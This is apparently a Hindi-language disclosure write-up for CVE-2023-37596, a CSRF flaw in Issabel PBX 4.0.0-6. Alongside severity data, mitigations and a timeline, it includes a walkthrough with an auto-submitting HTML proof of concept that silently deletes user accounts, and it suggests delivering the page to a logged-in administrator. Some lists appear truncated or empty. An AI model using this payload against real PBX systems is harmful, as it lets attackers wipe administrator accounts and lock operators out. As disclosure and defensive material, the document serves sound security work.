
CVE-2023-37596 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफ़ॉर्म है।
गंभीरता: उच्च | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता Issabel PBX संस्करण 4.0.0-6 में खोजी गई थी। उपयोगकर्ता प्रबंधन समापन बिंदु किसी भी CSRF सुरक्षा को लागू नहीं करता है, जो एक अनधिकृत रिमोट हमलावर को एक दुर्भावनापूर्ण वेब पेज तैयार करने की अनुमति देता है — जो जब एक प्रमाणित Issabel व्यवस्थापक द्वारा देखा जाता है — चुपचाप सिस्टम से किसी भी उपयोगकर्ता खाते को हटा देता है। बार-बार शोषण सभी प्रशासनिक उपयोगकर्ताओं को हटाकर पूरे एप्लिकेशन को दुर्गम बना सकता है।
| क्षेत्र | मान |
|---|---|
| CVE ID | CVE-2023-37596 |
| भेद्यता प्रकार | क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) |
| CWE | CWE-352 |
| उत्पाद | Issabel PBX |
| कमजोर संस्करण | 4.0.0-6 |
| विक्रेता होमपेज | https://www.issabel.org/ |
| सॉफ्टवेयर रिपॉजिटरी | https://github.com/IssabelFoundation/issabelPBX |
| परीक्षण किया गया | Windows |
| CVE प्रकाशित | 10/07/2023 |
| द्वारा खोजा गया | Sahil Ojha |
क्योंकि Issabel PBX अपने उपयोगकर्ता-प्रबंधन इंटरफ़ेस पर स्थिति-बदलने वाले अनुरोधों के मूल को मान्य नहीं करता है, एक सफल CSRF हमला हमलावर को अनुमति देता है:
| उत्पाद | प्रभावित संस्करण | स्थिति |
|---|---|---|
| issabel-pbx | 4.0.0-6 | असुरक्षित |
एक हमलावर एक दुर्भावनापूर्ण HTML पेज होस्ट करता है जिसमें Issabel PBX एप्लिकेशन के डिलीट-यूज़र एंडपॉइंट को लक्षित करने वाला एक जाली HTTP अनुरोध होता है। हमला स्वचालित रूप से (या बटन क्लिक पर) ट्रिगर होता है जब कोई उपयोगकर्ता जो Issabel में पहले से प्रमाणित है, उसी ब्राउज़र में दुर्भावनापूर्ण पेज पर जाता है। क्योंकि ब्राउज़र स्वचालित रूप से प्रत्येक अनुरोध के साथ पीड़ित के सत्र कुकीज़ शामिल करता है, सर्वर जाली विलोपन अनुरोध को वैध मान लेता है।
हमलावर की ओर से किसी विशेष विशेषाधिकार की आवश्यकता नहीं है — केवल एक सोशल-इंजीनियरिंग वेक्टर (फ़िशिंग लिंक, दुर्भावनापूर्ण विज्ञापन, आदि) जो प्रमाणित व्यवस्थापक को तैयार किए गए पेज पर लुभाने के लिए होता है।
इस हमले की प्रमुख विशेषताएं:
id=1, id=2, …) पेलोड को संशोधित करके लक्षित किया जा सकता है।Issabel PBX उपयोगकर्ता सूची पृष्ठ पर जाएं और व्यवस्थापक क्रेडेंशियल्स के साथ प्रमाणित करें:
https://<Issabel-IP>/index.php?menu=userlist


Burp Suite नीचे दिए गए समान एक HTML पेज तैयार करेगा। इसे .html फ़ाइल के रूप में सहेजें (जैसे, csrf_exploit.html):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
नोट:
<Issabel-IP>को लक्ष्य सर्वर के IP पते या होस्टनाम से बदलें, और किसी भिन्न उपयोगकर्ता खाते को लक्षित करने के लिएidमान समायोजित करें।
csrf_exploit.html फ़ाइल (या जहां यह होस्ट किया गया है उसका लिंक) उस उपयोगकर्ता को भेजें जो वर्तमान में Issabel PBX में लॉग इन है। जब पीड़ित पेज खोलता है, तो फॉर्म स्वचालित रूप से सबमिट हो जाता है और लक्ष्य उपयोगकर्ता बिना किसी पुष्टिकरण संकेत के हटा दिया जाता है।


इस भेद्यता को ठीक करने के लिए विक्रेता और/या सिस्टम प्रशासकों द्वारा निम्नलिखित सुरक्षा उपाय लागू किए जाने चाहिए:
CSRF टोकन लागू करें — क्रिप्टोग्राफिक रूप से यादृच्छिक, प्रति-सत्र (या प्रति-अनुरोध) टोकन उत्पन्न करें और प्रत्येक स्थिति-बदलने वाले अनुरोध के लिए इसे सर्वर-साइड मान्य करें। जिन अनुरोधों में मान्य टोकन नहीं है, उन्हें अस्वीकार किया जाना चाहिए।
SameSite कुकी विशेषता — सत्र कुकी की SameSite विशेषता को Strict या Lax पर सेट करें ताकि अधिकांश ब्राउज़रों में क्रॉस-ओरिजिन अनुरोधों द्वारा सत्र कुकी ले जाने से रोका जा सके।
Origin / Referer हेडर सत्यापित करें — सर्वर साइड पर, किसी भी स्थिति-बदलने वाले अनुरोध को अस्वीकार करें जिसका Origin या Referer हेडर एप्लिकेशन के अपने डोमेन से मेल नहीं खाता।
विनाशकारी कार्यों के लिए पुन: प्रमाणीकरण आवश्यक करें — उपयोगकर्ता खातों को हटाने जैसे अपरिवर्तनीय कार्यों को संसाधित करने से पहले उपयोगकर्ता को अपना पासवर्ड फिर से दर्ज करने के लिए प्रेरित करें।
न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें — सुनिश्चित करें कि केवल स्पष्ट व्यवस्थापक भूमिका वाले उपयोगकर्ता ही उपयोगकर्ता-विलोपन कार्यक्षमता तक पहुंच सकें, जिससे सफल हमले के विस्फोट त्रिज्या को कम किया जा सके।
जब तक विक्रेता पैच उपलब्ध नहीं हो जाता, प्रशासकों को सलाह दी जाती है:
| तारीख | घटना |
|---|---|
| 10/07/2023 | भेद्यता खोजी गई और रिपोर्ट की गई |
| 10/07/2023 | CVE-2023-37596 असाइन किया गया |
Sahil Ojha
अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए प्रकाशित की गई है। यहां प्रदान की गई जानकारी का उपयोग सिस्टम स्वामी से स्पष्ट लिखित अनुमति के बिना सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।